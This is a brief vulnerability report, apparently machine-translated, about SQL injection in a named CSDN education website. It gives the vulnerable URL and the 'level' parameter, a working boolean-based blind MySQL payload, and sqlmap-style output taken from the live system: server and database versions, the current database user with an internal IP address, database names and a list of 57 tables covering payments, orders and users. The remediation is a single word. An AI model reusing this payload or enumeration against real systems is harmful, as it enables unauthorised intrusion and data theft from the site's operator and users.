A csdn website has the SQL injection vulnerability.
A website in CSDN has the SQL injection vulnerability.
Http://edu.csdn.net/courses/p4? Attr = 3 & c_id = 0 & level = 2 & t =
---
Parameter: level (GET)
Type: boolean-based blind
Title: MySQL & gt; = 5.0 boolean-based blind-Parameter replace
Payload: attr = 3 & c_id = 0 & level = (SELECT (case when (1896 = 1896) THEN 1896 ELSE 1896 * (SELECT 1896 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END) & t =
---
Web application technology: PHP 5.5.17
Back-end DBMS: MySQL 5.0
Current user: 'sdnedu @ 192.168.110.26'
Available databases [2]:
[*] Information_schema
[*] Training
Database: training
[57 tables]
+ --------------------------- +
| Alipay_log |
| C_port_log |
| Column_course_type |
| Combo_course |
| Combo_info |
| Course_admin_log |
| Course_agency |
| Course_album |
| Course_album_lecturer |
| Course_buy_record |
| Course_carousel |
| Course_column |
| Course_column_type |
| Course_comment |
| Course_favorate |
| Course_fields |
| Course_info |
| Course_lecture_students |
| Course_lecturer |
| Course_lesson |
| Course_lesson_record |
| Course_record |
| Course_reg_basic |
| Course_reg_identy |
| Course_reg_question |
| Course_regfuser_expand |
| Course_regnouser_expand |
| Course_regquestion_option |
| Course_reguser_expand |
| Course_regusers_check_log |
| Course_statistics |
| Course_syllabus |
| Course_tag_relate |
| Course_test |
| Course_video |
| Course_video_jobs |
| Filter_words |
| Lecturer_book |
| Log |
| Log_download |
| M3u8_keys |
| Notice_mail |
| Notice_message |
| Order_detail |
| Orders |
| Resources |
| Test_log |
| Tickets |
| Tickets_group |
| Tmp_acl |
| Trial_info |
| Trial_users |
| Type_tag |
| Uc_log |
| Vip_card |
| Vip_card_apply |
| Vip_card_buy_record |
+ --------------------------- +
Solution:
Filter